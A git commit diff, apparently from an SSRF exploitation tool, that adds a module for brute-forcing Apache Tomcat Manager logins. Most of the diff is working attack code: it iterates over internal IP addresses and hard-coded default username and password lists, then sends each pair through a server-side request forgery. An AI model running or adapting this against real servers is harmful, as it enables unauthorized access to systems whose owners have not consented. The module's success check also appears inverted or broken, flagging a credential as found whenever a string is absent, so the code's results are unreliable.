MODULE - Tomcat module - bruteforce attack against manager

2018-12-29 22:12:45 +01:00 · 2018-12-29 22:12:45 +01:00 · e8751bb51e
parent ec40fe1f91
commit e8751bb51e
4 changed files with 35 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -69,6 +69,7 @@ The following modules are already implemented and can be used with the `-m` argu
 | `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
 | `socksproxy`   | SOCKS4 Proxy |
 | `smbhash`      | Force an SMB authentication via a UNC Path |
+| `tomcat`       | Bruteforce attack against Tomcat Manager |

 ## Contribute

--- a/core/utils.py
+++ b/core/utils.py
@ -14,7 +14,9 @@ def wrapper_gopher(data, ip, port):
 def wrapper_dict(data, ip, port):
    return "dict://{}:{}/{}".format(ip, port, data)

-def wrapper_http(data, ip, port):
+def wrapper_http(data, ip, port, usernm=False, passwd=False):
+    if usernm != False and passwd != False:
+        return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
    return "http://{}:{}/{}".format(ip, port, data)

 def wrapper_https(data, ip, port):
--- a/modules/tomcat.py
+++ b/modules/tomcat.py
@ -0,0 +1,31 @@
+from core.utils import *
+import logging
+
+name          = "tomcat"
+description   = "Tomcat - Bruteforce manager"
+author        = "Swissky"
+documentation = [
+    "https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html", 
+    "https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown"
+    ]
+
+class exploit():
+    SERVER_HOST   = "127.0.0.1"
+    SERVER_PORT   = "8888"
+    SERVER_TOMCAT = "manager/html"
+    tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"]
+    tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        # Using a generator to create the host list
+        gen_host = gen_ip_list(self.SERVER_HOST, args.level)
+        for ip in gen_host:
+            for usr in self.tomcat_user:
+                for pss in self.tomcat_pass:
+                    payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss)
+                    r = requester.do_request(args.param, payload)
+
+                    if not "s3cret" in r.text:
+                        logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))
--- a/screenshot/tomcat_example_ssrf.png
+++ b/screenshot/tomcat_example_ssrf.png